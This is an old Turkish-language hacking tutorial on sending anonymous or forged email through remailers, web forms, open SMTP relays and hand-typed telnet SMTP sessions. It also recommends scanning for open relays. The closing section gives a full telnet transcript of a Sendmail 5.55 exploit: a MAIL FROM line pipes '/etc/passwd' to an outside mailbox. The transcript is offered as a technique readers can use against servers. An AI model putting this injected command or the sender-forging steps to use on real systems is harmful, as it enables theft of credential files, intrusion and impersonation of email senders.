BÖLÜM-1
Anonymous Mail hakkında:
Bir e-posta gönderdiğinizde normal olarak kullandığınız e-posta ana
bilgisayarı bazı bilgileri de e-postanın en üst kısmına koyar. Bu bilgileri
rahatlıkla görebilirsiniz. Görebilmek için kullandığınız e-posta programına
bağlı olarak değişmekle birlikte seçeneklerden ayarlanabilir. Ayrıca Reply
seçeneğini seçerek bu bilgileri genellikle görebilirsiniz. Bilgi şuna
benzeyecektir:
[...]
Received: from HOSTNAME ([ip])
by mailserver (8.8.5/8.8.5) with SMTP id AAA28185
for
[email protected];
[...]
Bundan başka bilgiler de görülebilir. Ancak e-postayı gönderdiğiniz ana
bilgisayar ve sizin IP numaranız mutlaka görülecektir. Böyle bir durumda
Postmaster'a ([email protected]) bir e-posta gönderilerek e-postanın kimin
tarafından atıldığı kolayca tespit edilebilir.
İsterseniz kendinize bir e-posta atarak kendinize ait bilgileri alabilirsiniz ;)
Eğer ki göndereceğeniz mailde kendinize ait hiçbir bilginin yer almamasını
istiyorsanız Anonymous mail yöntemini tercih etmeniz gerekecek.
BÖLÜM-2
Anonymous Mail alma/gönderme yöntemleri:
Anonymous mail alıp göndermenin birden fazla yöntemi vardır. Burada
anlatılacak yöntemlerle anonymous mail atabilirsiniz.
Yöntem-1: REMAILER'lar:
Remailer kullanmak en güvenli yöntemdir. Remailer yöntemiyle size ait (host, IP
vs.) bilgiler karşı tarafa iletilmez.
Avantajları:
Aynı maili birden fazla adet ve birden fazla kişiye gönderebilirsiniz.
Çok güvenlidir. Herhangi bir log tutulmaz. PGP (Privacy Good Public --> www.pgp.com)
kullanabilirsiniz.
Dezavantajları:
Mail alamazsınız. Bu iş için özel yapılmış programları kullanmanız gerekir. (Private
Idaho gibi).
Çok zaman alıcıdır. Bazen atacağınız mail saatler sürebilir.
Remailer'lar ilgili ilave bilgiyi internette pek çok yerde bulabilirsiniz.
Yöntem-2: INTERNETTEKİ MAİL FORMLAR / BEDAVA WEB TABANLI EMAİL HİZMETİ.
Mail formu adı verilen ve HTML-CGI kullanılarak oluşturulan formlar
üzerinden kolayca anonymous mail gönderebilirsiniz. Genellikle bu hizmette IP
numaranız ya da bilgisayarınızın adı tutulmaz/tutulamaz. Gönderdiğiniz mailde
mailin gönderildiği web ana makinasının adı geçecektir. Eh artık bu iş için
kullanacağınız bir mailde kendi adınızı da vermezseniz!! gerçek adınız mail
attığınız adrese iletilmeyecektir ;)
Avantajları:
Mail adresinizde isim olarak ne vermişseniz karşı tarafa o gidecektir. (Örneğin
Bill Hates diyebilirsiniz ;))
Dezavantajları:
Maili yazarken muhtemelen internette olmanız gerekecek. Gönderirken de bu tür
ana makinalarda haddinden fazla yoğunluk olduğu için maili göndermeniz uzun
süreceğinden yüklü bir telefon faturasıyla karşılaşmanız olası. Ayrıca aynı anda
birden fazla mail gönderemediğiniz için birilerine şaka yapmayacaksanız pek
tavsiye etmem ;)
Dikkat !! Bazı ana makinalar log tutuyorlarmış. Dikkatli olmanız önerilir.
Yöntem-3: PUBLIC SMTP ANA MAKİNALARI:
Bazı SMTP makinalarında Sendmail'in eski versiyonları kullanılmakta. Bu tür
mail ana makinalar IP'yi ve bilgisayar adını göndermezler. (Kendi SMTP
makinanızı kontrol edin). Aynı zamanda istediğiniz e-mail programını da
kullanarak mail gönderebilirsiniz.
Sendmail'in eski versiyonu kullanılıyorsa mailin başlığında:
[...]
Received: from HOSTNAME by mailserver (8.8.7/ZRZ-Gen-8) with SMTP id AAA23022
for <[email protected]>;
[...]
Dikkat ettiyseniz sizinle ilgili hiç bir bilgi geçmiyor.
Yöntem-4: TELNET KULLANMAK:
Windows 95 altından Telnet programını kullanarak anonymous mail atmanız
mümkün.
4.1- Start/Run menüsünden Open bölümüne "telnet" yazıp Enter tuşuna basın.
Karşınıza telnet penceresi çıkacak.
4.2- Connect menüsünden Remote System'e gelin Anonymous Mail atacağınız SMTP ana
makinası 25 yazın. ("aliveli.com.tr:25") gibi.
4.3- "HELO SMTP ana makina adı" yazın. (HELO aliveli.com.tr)
4.4- "MAIL FROM:gönderen" yazın. (MAIL FROM:Ali Veli) (Ali Veli sizin
uydurduğunuz gönderici adı)
4.5- "RCPT TO:alıcı" yazın. (RCPT TO:[email protected])
4.6- "DATA" yazın. (DATA)
4.7- Mesajınızı yazın.
4.8- Mailinizi gönderin!
4.9- İşiniz bitince "QUIT" yazıp çıkın. (QUIT)
(Tırnak içinde verilen ifadeleri tırnağa almadan ve boşluklara dikkat ederek
yazın. Herhangi bir kademede takılırsanız "HELP" yazarak SMTP makinasından
yardım alabilirsiniz ;)
BÖLÜM-3
ANONYMOUS SERVER NASIL BULUNUR?
Artık pek çok SMTP makinasından anonymous mail göndermek imkansız hale
geldi. MailScan (16 Bit) programıyla anonymous mail atabileceğiniz ana
makinaları arattırabilirsiniz. (Bu programı ve daha pek çok yararli ;) programa
ana sayfa üzerinden STUFF butonuna tıklayarak ulaşabilirsiniz)
Ama size daha geçerli bir yöntem önerebilirim:
.CN uzantılı (SMTPMakinasi.net.cn gibi) pek çok SMTP makinası üzerinden
(yaklaşık %80) anonymous mail gönderebilirsiniz. (Hoş CN hangi ülkeyi temsil
eder onu da bilmiyorum ya :)) Ciddi bir sorun karşımıza çıkıyor: .CN uzantılı
ana makinaları nasıl listeleyeceğim: Bu sorunu da değerli AltaVista makinası
üzerinden hallediyoruz. (Diğer arama motorlarında denemedim). Aramada
kullanacağımız anahtar kelimeler "HOST: CN" ya da "HOST: .NET.CN" (Aynen bu
formatta olmalı). Karşınıza artık pek çok deneme yapabileceğiniz SMTP ana
makinası geldi. e-mail programınızla denemelere başlayabilirsiniz. Siz değerli
okurlarım için iyi bir MAILSCANNER programı arama çalışmalarım sürüyor :)
3- Sendmail Açıkları (Bölüm I).
Anonymous Mail anlatılırken yöntem 4'te bahsedilen mantığı kullanarak Unix
tabanlı sistemlerin şifre dosyalarını almak zaman zaman mümkün olabiliyor (Sendmail
5.55'te karşılaşılan bir açık). Yapmanız gereken şunlar:
Telnet anamakina.adı:25
Trying 194.456.789.0...
Connected to target.com
Escape character is '^]'.
220 target.com Sendmail 5.55 ready at Mon, 12 Jun 98 23:51
mail from: "|/bin/mail [email protected] < /etc/passwd"
250 "|/bin/mail [email protected] < /etc/passwd"... Sender ok
rcpt to: mickeymouse
550 mickeymouse... User unknown
data
354 Enter mail, end with "." on a line by itself
.
250 Mail accepted
quit
Connection closed by foreign host.
%
[email protected] sizin mail adresiniz olacak. Şifre dosyası mail adresinize
postalanacaktır..
Sendmail'in daha pek çok hatası var.